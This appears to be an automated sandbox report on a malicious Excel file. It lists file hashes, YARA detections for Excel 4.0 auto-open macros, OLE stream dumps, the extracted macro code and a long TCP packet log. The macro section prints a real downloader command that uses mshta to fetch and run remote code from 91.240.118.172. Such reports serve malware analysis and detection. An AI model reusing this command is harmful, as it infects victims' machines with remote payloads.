                                                                                                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                    C:\Users\user\Desktop\DOCUMENT_2801.xls

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:33:44 2022, Last Saved Time/Date: Fri Jan 28 07:31:35 2022, Security: 0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):91648
                                                                                                                    Entropy (8bit):6.8970131412860605
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:ZxIk3hbdlylKsgqopeJBWhZFGkE+cL2NdA/6yH5Eb7EdrpFkkGX/sGC6ORQQDBhO:ZSk3hbdlylKsgqopeJBWhZFGkE+cL2NH
                                                                                                                    MD5:8A307768DFEF529EFD715E73A760B6F6
                                                                                                                    SHA1:85D4535736310A907B2FF366291B65DB50B3453F
                                                                                                                    SHA-256:FCE66FFF96A52981013AF7D73751A1A7B46EC5DD007D5390903B60A60B714CF5
                                                                                                                    SHA-512:BCAFD16F994C49AE1407D0FA4D38049D7300130EDB88E1C0629EC6D3962964265E48AAF4AF9096AB7795F1635B2C0EAE378736BA8843F43634105941749F8554
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, Author: John Lambert @JohnLaTwC
                                                                                                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, Author: Joe Security
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=....... Xa&8.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.*.h...6..........C.a.l.i.b.r.i. .L.i.g.h.t.1.

                                                                                                                    C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy)

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):557056
                                                                                                                    Entropy (8bit):7.0041357928485235
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGZUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTnqyDx6BrWt
                                                                                                                    MD5:900A5B681C016FE03EECB59DBC4855A4
                                                                                                                    SHA1:A96CD94DF4DD7A76F636866E9C79E995E1175F2A
                                                                                                                    SHA-256:B77B1E649BFF7CC04B78717A35B00CE24441B09F977098B39E31A716BE5E8CAD
                                                                                                                    SHA-512:4E0FC66FC0D8672B2A7523329D4A0BC60A664EDEC062C59305DF40CADB890ADE1ED7FAE2C893445C9D199FBCECECC508349D6D3B32DA351EFB7F9A09DE1A24E1
                                                                                                                    Malicious:false
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:33:44 2022, Last Saved Time/Date: Fri Jan 28 07:31:35 2022, Security: 0
                                                                                                                    Entropy (8bit):6.862007600534603
                                                                                                                    TrID:
                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                    File name:DOCUMENT_2801.xls
                                                                                                                    File size:92340
                                                                                                                    MD5:3f397d9cca325167d86d575896d40207
                                                                                                                    SHA1:54b8106c1715eb58230371fa033cbdec1e3aaeff
                                                                                                                    SHA256:f695adbe8668cdef7b307bc0fc89a664d8002b42dc91b8a01a75aec4cfc9018c
                                                                                                                    SHA512:ab12fc057dae37f8a39092ee4995a114dca0641041408b09514346e7b474bae4e35d283c7e8e31ca120a88563c6c5e35c6ecd50bd633a4dc7202641158357946
                                                                                                                    SSDEEP:1536:8xIk3hbdlylKsgqopeJBWhZFGkE+cL2NdA/6yH5Eb7EdrpFkkGX/sGC6ORQQDBh+:8Sk3hbdlylKsgqopeJBWhZFGkE+cL2Nx
                                                                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:e4eea286a4b4bcb4

                                                                                                                    Static OLE Info

                                                                                                                    General

                                                                                                                    Document Type:OLE
                                                                                                                    Number of OLE Files:1

                                                                                                                    OLE File "DOCUMENT_2801.xls"

                                                                                                                    Indicators
                                                                                                                    Has Summary Info:True
                                                                                                                    Application Name:Microsoft Excel
                                                                                                                    Encrypted Document:False
                                                                                                                    Contains Word Document Stream:False
                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                    Contains Visio Document Stream:False
                                                                                                                    Contains ObjectPool Stream:
                                                                                                                    Flash Objects Count:
                                                                                                                    Contains VBA Macros:True
                                                                                                                    Summary
                                                                                                                    Code Page:1251
                                                                                                                    Author:xXx
                                                                                                                    Last Saved By:xXx
                                                                                                                    Create Time:2022-01-27 23:33:44
                                                                                                                    Last Saved Time:2022-01-28 07:31:35
                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                    Security:0
                                                                                                                    Document Summary
                                                                                                                    Document Code Page:1251
                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                    Company:
                                                                                                                    Contains Dirty Links:False
                                                                                                                    Shared Document:False
                                                                                                                    Changed Hyperlinks:False
                                                                                                                    Application Version:1048576

                                                                                                                    Streams

                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                    General
                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.319071371437
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . M a c r o 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 aa 00 00 00
                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                    General
                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.262870751343
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . R . . . . @ . . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81211
                                                                                                                    General
                                                                                                                    Stream Path:Workbook
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:81211
                                                                                                                    Entropy:7.38151716612
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . X a & 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                    Macro 4.0 Code

                                                                                                                    Name:Macro3
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    Macro33False0Falsepost2,2,=EXEC("cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd")5,2,=HALT()
                                                                                                                    Name:Macro3
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    Macro33False0Falsepre2,2,=EXEC("cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd")5,2,=HALT()

                                                                                                                    Network Behavior

                                                                                                                    Snort IDS Alerts

                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                    01/28/22-21:15:07.666041TCP2034631ET TROJAN Maldoc Activity (set)4916680192.168.2.2291.240.118.172

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 28, 2022 21:15:02.989120960 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:03.047852993 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.048145056 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:03.049511909 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:03.108176947 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.108724117 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.108746052 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.108766079 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.108783007 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.108795881 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.108809948 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:03.108814955 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.108833075 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:03.108834028 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.108835936 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:03.108846903 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.108861923 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.108865976 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:03.108875990 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:03.108875990 CET804916591.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:03.108886003 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:03.108892918 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:03.108908892 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:03.117295027 CET4916580192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:07.600526094 CET4916680192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:07.661833048 CET804916691.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:07.663830042 CET4916680192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:07.666040897 CET4916680192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:07.729029894 CET804916691.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:07.729461908 CET804916691.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:07.729482889 CET804916691.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:07.730539083 CET4916680192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:15:07.806807995 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:07.945823908 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:07.945950031 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:07.946124077 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.085160971 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.091576099 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.091607094 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.091629982 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.091651917 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.091674089 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.091696024 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.091717958 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.091739893 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.091763020 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.091785908 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.091909885 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.091936111 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230431080 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230458975 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230477095 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230495930 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230513096 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230514050 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230526924 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230545998 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230557919 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230568886 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230590105 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230607033 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230612040 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230618000 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230624914 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230642080 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230657101 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230659008 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230674982 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230691910 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230693102 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230710030 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230726004 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230729103 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230746984 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230760098 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230765104 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230782032 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230793953 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369255066 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369285107 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369302034 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369321108 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369339943 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369357109 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369378090 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369395018 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369395018 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369411945 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369426966 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369430065 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369436979 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369448900 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369467020 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369477034 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369484901 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369503975 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369522095 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369538069 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369546890 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369554996 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369565964 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369571924 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369590044 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369594097 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369606972 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369623899 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369642019 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369649887 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369658947 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369678020 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369694948 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369713068 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369719028 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369729996 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369749069 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369775057 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369781017 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369791031 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369807005 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369815111 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369823933 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369832039 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369843006 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369875908 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369894028 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369898081 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369910002 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369930029 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369946957 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369951963 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.373645067 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.508466005 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508524895 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508565903 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508605003 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508644104 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508646965 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.508671999 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.508685112 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508723974 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508730888 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.508764982 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508807898 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508846045 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508851051 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.508887053 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508927107 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508968115 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508968115 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509008884 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509046078 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509084940 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509088993 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509124994 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509164095 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509203911 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509207010 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509243011 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509283066 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509314060 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509332895 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509355068 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509394884 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509426117 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509455919 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509465933 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509507895 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509546995 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509552002 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509587049 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509627104 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509634972 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509665966 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509706974 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509747028 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509766102 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509789944 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509831905 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509876013 CET4916780192.168.2.22136.0.111.15
